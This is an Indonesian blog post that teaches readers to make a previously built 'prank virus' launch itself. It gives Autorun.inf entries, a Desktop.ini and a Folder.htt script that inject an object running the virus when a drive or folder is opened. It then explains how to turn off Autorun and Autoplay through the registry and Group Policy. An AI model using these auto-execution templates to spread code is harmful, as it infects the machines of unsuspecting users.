Nah kemaren kita udah coba buat Viruz iseng...nah sekarang kita coba bagaimana viruz itu dapat berjalan tanpa disuruh...[inisiatif yg tinggi] hehehe.... [Autorun] Shelexecute=%nama file induk virus yang akan dijalankan% Atau [AutoRun] open=%file virus% shellexecute=%file virus% shell\Auto\command=%file virus% shell=Auto Gambar 1, Script Autorun.inf untuk menjalankan file Folder.exe Biasanya file Desktop.ini akan berpasangan dengan file .HTT [contohnya folder.htt] dibuat dengan tujuan untuk menjalankan script lain kemudian file script yang dijalankan tersebut mempunyai script lain untuk menjalankan file virus. Berikut contoh script yang akan dibuat oleh virus. [.ShellClassInfo] ConfirmFileOp=0 [{5984FFE0-28D4-11CF-AE66-08002B2E1262}] PersistMoniker=%lokasi file Folder.htt yang dibuat virus% [ExtShellFolderViews] {5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262} Gambar 2, Script file Desktop.ini untuk menjalankan file folder.htt [file folder.htt ini sendiri akan berisi script untuk menjalankan file virus seperti terlihat pada gambar dibawah ini.] <html> <head> <meta http-equiv=”content-type”content=”text/html; charset=Windows-1252″> </head> <body style=”margin: 0″ scroll=no> <object id=FileList border=0 tabindex=1 classid= “clsid:1820FED0-473E-11D0-A96C-00C04FD705A2″ style=”width: 100; height: 100″ tabIndex=-1> </object> </body> </html> <script> objectstr=”<OBJECT ID=\”RUNIT\” WIDTH=0 HEIGHT=0 TYPE=\”application/x-oleobject\”” objectstr+=”CODEBASE=\”%file virus yang akan dijalnkan% #version=1,1,1,1\”>” objectstr+=”<PARAM NAME=\”_Version\” VALUE=\”65536\”>” objectstr+=”</OBJECT>” objectstr+=”<HTML><H1></H1></HTML>”; document.writeln(objectstr); document.close(); </script> Gambar 3, Script Folder.htt akan menjalankan file New Folder.exe Bagaimana Cara Menghadapinya ? Salah satu cara yang efektif untuk mencegah penyebaran virus lokal yang menggunakan metode ini adalah dengan men-disable fungsi Autorun/Autoplay pada Drive/Removable tersebut. Untuk Disable Autorun/Autoplay dapat menggunakan beberapa cara diantaranya : (jalankan hanya salah satu) § Buka Registry Editor Klik menu [Start | Run | pada dialog box RUN ketik regedit] § Browse ke alamat registry berikut HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer § Kemudian klik kanan pada string NoDriveTypeAutoRun Gambar 4, Alamat registry yang harus diubah agar autorun tidak aktif § Isi value data dengan ff yang berarti fungsi Aturun/Autoply akan di matikan pada 255 drive Gambar 5, Merubah value NoDriveTypeAutorun § Klik Tombol [OK] § Keluar dari “Registry Editor” § Restart komputer agar perubahan ini berjalan § Klik menu [Start] § Klik [Run] § Ketik GPEDIT.MSC pada kolom “RUN” § Setelah muncul layar “Group Policy” klik folder “System” pada menu “User Configuration” dan “Computer Configuration” § Pada kolom Settings, klik dua kali “Turn off Autoplay” Gambar 6, Interface Group Policy “User Configuration” Gambar 7, Interface Group Policy “Computer Configuration” § Setelah muncul layar “Turn off Autoplay” properties, klik tabulasi [Settings] dan pilih opsi “Enable” pada menu “Turn off Autoplay” kemudian Pilih “All Drive” pada kolom “Turn off Autoplay on” Gambar 8, Mematikan Autoplay dengan menggunaakn Group Policy o Kemudian klik tombol “OK” Gambar 9, Disable Autoplay Lalu Klik close...dan untuk lebih sempurna dan perintahnya benar2 dijalankan...kamu coba untuk Log out lalu Log in lagi....
Sebenarnya kita hanya perlu menambahkan program file yg dapat membuat file viruz itu dapat berjalan sendiri...seperti Autorun.inf, desktop.ini dengan folder.httt
Tapi teman tenang aja...kita bahas juga bagaimana pencegahannya...so...Lanjut....^^
Stay cool n Enjoy....^^
NS : http://hari.000webhost.info
- Let`s Get some Action
Autorun
ME
- Kurtz
- Saya hanya orang biasa yang haus akan pengetahuan... Saya hanya yang ingin menjadi lebih baik dengan belajar... mari kita sama2 mempertinggi pengetahuan...^_^
0 komentar:
Posting Komentar